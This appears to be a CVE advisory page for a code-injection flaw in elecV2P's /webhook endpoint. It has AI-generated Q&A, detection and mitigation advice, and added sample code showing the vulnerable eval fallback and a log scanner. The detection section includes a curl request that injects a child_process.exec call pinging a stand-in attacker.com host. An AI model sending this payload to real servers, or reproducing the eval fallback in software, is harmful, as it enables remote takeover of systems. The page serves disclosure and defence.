CVE-2026-5011
Remote Code Injection in elecV2P JSON Parser (runJSFile
Publication date: 2026-03-28
Last updated on: 2026-04-29
Assigner: VulDB
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| elecv2 | elecv2p | up to 3.8.3 (inclusive) |
Exploitability
| CWE ID | Description |
|---|---|
| CWE-74 | The product constructs all or part of a command, data structure, or record using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify how it is parsed or interpreted when it is sent to a downstream component. |
| CWE-94 | The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment. |
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2026-5011 is a Remote Code Execution (RCE) vulnerability in the elecV2P application, specifically in its `/webhook` endpoint. The vulnerability occurs because the endpoint accepts a parameter called `rawcode` which is passed directly to a function named `runJSFile()` for execution.
The vulnerability arises from unsafe handling of the `rawcode` parameter. The application tries to parse input strings as JSON, but if parsing fails, it falls back to evaluating the string as JavaScript code using `new Function()`. This fallback allows attackers to inject and execute arbitrary JavaScript code remotely.
An attacker can exploit this by sending a specially crafted request with malicious JavaScript code in the `rawcode` parameter, which can include system-level commands executed via Node.js modules like `child_process`. This enables full remote code execution on the affected system.
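The parse-then-evaluate fallback described above, reduced to a minimal form beside a strict replacement. This is an added example, not code from elecV2P or from this page; the function names and the inputs are assumptions made for illustration.

```javascript
// Added illustration; looseParse and strictParse are hypothetical names, not elecV2P code.

// Vulnerable pattern: whatever JSON.parse rejects is evaluated as JavaScript.
function looseParse(input) {
  try {
    return JSON.parse(input);
  } catch (e) {
    // Caller-controlled text reaching this line runs inside the server process.
    return new Function('return ' + input)();
  }
}

// Hardened form: input is only ever data. A parse failure is reported, never evaluated.
function strictParse(input) {
  try {
    return { ok: true, value: JSON.parse(input) };
  } catch (e) {
    return { ok: false, error: 'invalid JSON' };
  }
}

// Constructed inputs. The second is not JSON; as a harmless stand-in for injected
// code it only sets a marker on globalThis so the side effect can be observed.
function demo() {
  const valid = '{"a": 1}';
  const notJson = "(globalThis.sideEffect = 'ran', {a: 1})";

  delete globalThis.sideEffect;
  const looseValue = looseParse(notJson);
  const executedByLoose = globalThis.sideEffect === 'ran';

  delete globalThis.sideEffect;
  const strictResult = strictParse(notJson);
  const executedByStrict = globalThis.sideEffect === 'ran';
  delete globalThis.sideEffect;

  return {
    sameOnValidJson: looseParse(valid).a === strictParse(valid).value.a,
    looseValue, executedByLoose, strictResult, executedByStrict,
  };
}

console.log(demo());
```

Both functions agree on well-formed JSON; they differ only on input that fails to parse, which is exactly the input an attacker chooses.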
How can this vulnerability impact me?
This vulnerability allows an attacker to remotely execute arbitrary code on the affected system running elecV2P. This means an attacker can run any commands they choose, potentially taking full control of the system. Possible consequences include:
- Execution of malicious scripts or commands leading to data theft or destruction.
- Installation of malware or backdoors for persistent access.
- Disruption of services or system operations.
- Compromise of sensitive information or credentials stored on the system.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by monitoring for requests to the `/webhook` endpoint that include the `rawcode` parameter, especially POST requests containing JavaScript code execution attempts.
A practical detection method involves checking for suspicious POST requests with a valid webhook token and the `type` parameter set to `jsrun`, `runjs`, or `runscript` that carry encoded JavaScript payloads.
Example commands to detect exploitation attempts include:
- Using tcpdump or tshark to capture HTTP requests to the `/webhook` endpoint (the filter below selects port-80 packets that carry a payload, so it sees plaintext HTTP only):

  ```
  tcpdump -A -s 0 'tcp port 80 and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)' | grep '/webhook'
  ```

- Using curl or similar tools to manually test the endpoint with a crafted payload (requires a valid token):

  ```
  curl -X POST http://target/webhook -d '{"token":"<valid_token>","type":"jsrun","rawcode":"require(\"child_process\").exec(\"ping attacker.com\")"}'
  ```
Additionally, reviewing server logs for requests containing the `rawcode` parameter or unusual JavaScript execution attempts can help detect exploitation.
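The log review described above can be scripted. The following is an added example, not part of the original page or of elecV2P: it flags `/webhook` requests whose `type` is `jsrun`, `runjs` or `runscript` and that carry a `rawcode` value. The log format (one JSON object per line with `time`, `src`, `method`, `url` and `body`) and all sample entries are assumptions constructed for the demonstration.

```javascript
// Added illustration. Assumed log format: one JSON object per line with
// time, src, method, url and body (a proxy configured to record request bodies).
const RUN_TYPES = new Set(['jsrun', 'runjs', 'runscript']);

// Pull `type` and `rawcode` from a JSON body, a form-encoded body or the query string.
function extractFields(url, body) {
  const parsed = new URL(url, 'http://log.invalid'); // base only needed for relative URLs
  let fromBody = {};
  if (body) {
    try {
      fromBody = JSON.parse(body) || {};
    } catch (e) {
      fromBody = Object.fromEntries(new URLSearchParams(body));
    }
  }
  const pick = (k) => (fromBody[k] !== undefined ? fromBody[k] : parsed.searchParams.get(k));
  return { path: parsed.pathname, type: pick('type'), rawcode: pick('rawcode') };
}

// A hit is a /webhook request that selects a script-running type and carries inline code.
function isSuspicious(entry) {
  const { path, type, rawcode } = extractFields(entry.url, entry.body);
  return path === '/webhook' && RUN_TYPES.has(String(type)) &&
    typeof rawcode === 'string' && rawcode.length > 0;
}

function scan(logText) {
  const hits = [];
  for (const line of logText.split('\n')) {
    try {
      const entry = JSON.parse(line);
      if (entry && typeof entry.url === 'string' && isSuspicious(entry)) {
        hits.push({ time: entry.time, src: entry.src });
      }
    } catch (e) { /* malformed line or unparsable URL: skip */ }
  }
  return hits;
}

// Constructed sample entries (documentation addresses, harmless code strings).
const body = (o) => JSON.stringify(o);
const SAMPLE_LOG = [
  { time: '10:00:01', src: '198.51.100.7', method: 'POST', url: '/webhook', body: body({ token: 'REDACTED', type: 'runjs', rawcode: '1+1' }) },
  { time: '10:00:05', src: '192.0.2.10', method: 'POST', url: '/webhook', body: body({ token: 'REDACTED', type: 'status' }) },
  { time: '10:00:09', src: '198.51.100.7', method: 'GET', url: '/webhook?token=REDACTED&type=jsrun&rawcode=1%2B1', body: '' },
  { time: '10:00:12', src: '203.0.113.4', method: 'POST', url: '/webhook', body: 'token=REDACTED&type=runscript&rawcode=1%2B1' },
  { time: '10:00:15', src: '192.0.2.10', method: 'POST', url: '/other', body: body({ type: 'runjs', rawcode: '1+1' }) },
].map((e) => JSON.stringify(e)).concat('truncated {').join('\n');

console.log(scan(SAMPLE_LOG));
```

A hit is a lead for review, not proof of exploitation: the log alone does not show whether the token was valid or what the submitted code did.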
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation steps include restricting or disabling access to the `/webhook` endpoint, especially from untrusted networks.
Ensure that the webhook token (`CONFIG.wbrtoken`) is strong, unique, and kept secret to prevent unauthorized access.
If possible, temporarily disable the functionality that executes JavaScript code from the `rawcode` parameter or apply input validation to prevent unsafe code execution.
Monitor network traffic and logs for suspicious activity related to the `/webhook` endpoint and block IP addresses exhibiting exploit attempts.
Since the project has not yet responded with a patch, consider isolating the affected service or applying firewall rules to limit exposure until an official fix is released.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?
CVE-2026-5011 is a remote code execution vulnerability that allows attackers to execute arbitrary system commands via the elecV2P application's /webhook endpoint. This can lead to unauthorized access, data manipulation, or data exfiltration.
Such unauthorized access and potential data breaches can negatively impact compliance with common standards and regulations like GDPR and HIPAA, which require protection of personal and sensitive data against unauthorized access and breaches.
Because the vulnerability enables remote code execution without proper validation, it increases the risk of data compromise, which may result in violations of data protection requirements and lead to legal and regulatory consequences.